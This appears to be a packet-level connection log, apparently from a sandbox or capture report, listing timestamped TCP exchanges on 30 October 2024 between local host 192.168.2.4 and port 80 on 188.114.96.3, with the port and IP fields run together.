                                                        Oct 30, 2024 05:24:04.159600973 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.160228968 CET8050140188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.160298109 CET5014080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.164967060 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.291132927 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.296586037 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.296663046 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.296758890 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.302139997 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.511727095 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.517123938 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.517205954 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.652276039 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.657685995 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.757013083 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.808466911 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.902230978 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:04.950931072 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:04.967663050 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.014754057 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.107672930 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.152698040 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.225363016 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.225419044 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.226212978 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231076956 CET8050142188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.231615067 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.231720924 CET8050141188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.231749058 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231761932 CET5014280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231832027 CET5014180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.231933117 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.237255096 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.590154886 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:05.595518112 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.836293936 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:05.980350018 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.040776968 CET8050143188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.133347988 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.170201063 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.175786972 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.175862074 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.175977945 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.181366920 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.527570963 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:06.532891989 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.771384001 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.966308117 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:06.966471910 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.083844900 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.084939003 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.089612961 CET8050144188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.089751959 CET5014480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.090284109 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.090485096 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.090485096 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.095776081 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.452671051 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.458156109 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.679929972 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.731358051 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:07.894293070 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:07.949445009 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.008894920 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.009713888 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.014535904 CET8050145188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.014601946 CET5014580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.014986992 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.015057087 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.015168905 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.020430088 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.371186018 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.376660109 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.613293886 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.667839050 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:08.930634975 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:08.982733965 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.053426027 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.053438902 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.058903933 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.059056997 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.059138060 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.059619904 CET8050146188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.059798956 CET5014680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.064446926 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.419033051 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.424623013 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.678165913 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.860001087 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.933211088 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.933257103 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.933274031 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.974524021 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.981682062 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.982352018 CET5014880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.987401962 CET8050147188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.987454891 CET5014780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.988595963 CET8050148188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:09.988661051 CET5014880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.988802910 CET5014880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:09.994134903 CET8050148188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.051434994 CET5014380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.055455923 CET5014880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.056411028 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.061857939 CET8050149188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.061932087 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.062053919 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.067368984 CET8050149188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.102902889 CET8050148188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.418000937 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.423435926 CET8050149188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.465187073 CET8050148188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.465251923 CET5014880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.656299114 CET8050149188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.732498884 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:10.880969048 CET8050149188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:10.980721951 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.008172035 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.008172989 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.013727903 CET8050150188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:11.014091969 CET8050149188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:11.016932011 CET5014980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.016933918 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.017092943 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.022675991 CET8050150188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:11.372715950 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.378029108 CET8050150188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:11.606013060 CET8050150188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:11.778814077 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:11.904074907 CET8050150188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:12.021795988 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:12.027483940 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:12.032810926 CET8050151188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:12.032880068 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:12.032974958 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:12.038228035 CET8050151188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:12.386756897 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:12.392178059 CET8050151188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:12.640022993 CET8050151188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:12.683496952 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:12.875405073 CET8050151188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:12.934825897 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.001996040 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.002506018 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.007692099 CET8050151188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.007836103 CET5015180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.007848978 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.007940054 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.008143902 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.013472080 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.442291021 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.447767973 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.614451885 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.684729099 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:13.880127907 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.880150080 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:13.880213022 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.004955053 CET5015080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.005134106 CET5005780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.005265951 CET5012280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.005445957 CET5008880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.011281967 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.012619972 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.016784906 CET8050152188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:14.016843081 CET5015280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.017937899 CET8050153188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:14.018110037 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.018160105 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.023390055 CET8050153188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:14.372090101 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.378160954 CET8050153188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:14.623405933 CET8050153188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:14.667900085 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:14.922219992 CET8050153188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:14.980389118 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.040090084 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.044723034 CET5015480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.045881987 CET8050153188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.045984983 CET5015380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.050050020 CET8050154188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.052377939 CET5015480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.052604914 CET5015480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.057833910 CET8050154188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.061604023 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.061862946 CET5015480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.066950083 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.067059040 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.085863113 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.091197968 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.115489006 CET8050154188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.211549997 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.216967106 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.217125893 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.218528032 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.223872900 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.433660984 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.439101934 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.439187050 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.529021978 CET8050154188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.530991077 CET5015480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.574776888 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.580248117 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.662856102 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.824914932 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.864720106 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:15.864816904 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:15.871031046 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.021486998 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.021511078 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.021570921 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.363224983 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.363333941 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.376349926 CET8050155188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.376370907 CET8050156188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.376408100 CET5015580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.376454115 CET5015680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.385077000 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.390569925 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.390678883 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.390786886 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.396053076 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.746069908 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:16.751555920 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:16.984339952 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:17.073563099 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.275614977 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:17.275938034 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:17.276138067 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.397089005 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.398061991 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.402744055 CET8050157188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:17.402873993 CET5015780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.403410912 CET8050158188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:17.403603077 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.403728962 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.409008980 CET8050158188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:17.761730909 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:17.767105103 CET8050158188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.004386902 CET8050158188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.152755976 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:18.204507113 CET8050158188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.277299881 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:18.321105957 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:18.326432943 CET8050159188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.326518059 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:18.326663971 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:18.332037926 CET8050159188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.683706999 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:18.689234972 CET8050159188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.920571089 CET8050159188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:18.964785099 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.245991945 CET8050159188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:19.296747923 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.365902901 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.366722107 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.371471882 CET8050159188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:19.371591091 CET5015980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.372024059 CET8050160188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:19.372251034 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.372400999 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.377625942 CET8050160188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:19.732747078 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:19.738202095 CET8050160188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:19.966245890 CET8050160188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.011646986 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.161365986 CET8050160188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.214778900 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.295921087 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.297113895 CET5016180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.301700115 CET8050160188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.301752090 CET5016080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.302450895 CET8050161188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.302517891 CET5016180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.302608967 CET5016180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.307868004 CET8050161188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.652537107 CET5016180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.657996893 CET8050161188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.872272015 CET5016180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.873280048 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.878618956 CET8050161188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.878633022 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.880852938 CET5016180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.880856991 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.880929947 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.886326075 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:20.992742062 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:20.998608112 CET8050163188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.000941992 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.000941992 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.006232977 CET8050163188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.236778975 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.242546082 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.243001938 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.370970011 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.377055883 CET8050163188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.489413023 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.598081112 CET8050163188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.652656078 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.684756994 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.704482079 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.799385071 CET8050163188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.855890989 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.872756004 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.914202929 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.914275885 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.915446997 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.919887066 CET8050162188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.919936895 CET5016280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.920315981 CET8050163188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.920361996 CET5016380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.920762062 CET8050164188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:21.920820951 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.920978069 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:21.926238060 CET8050164188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:22.277399063 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:22.282774925 CET8050164188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:22.518390894 CET8050164188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:22.651133060 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:22.828290939 CET8050164188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:22.886658907 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:22.946762085 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:22.952088118 CET8050165188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:22.952392101 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:22.952521086 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:22.957757950 CET8050165188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:23.308609962 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.313944101 CET8050165188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:23.763042927 CET8050165188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:23.765311003 CET8050165188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:23.767199993 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.877222061 CET5016480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.882236958 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.883249044 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.888032913 CET8050165188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:23.888088942 CET5016580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.888525963 CET8050166188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:23.888592005 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.888788939 CET5016680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:23.894035101 CET8050166188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:24.246227980 CET5016680192.168.2.4188.114.96.3
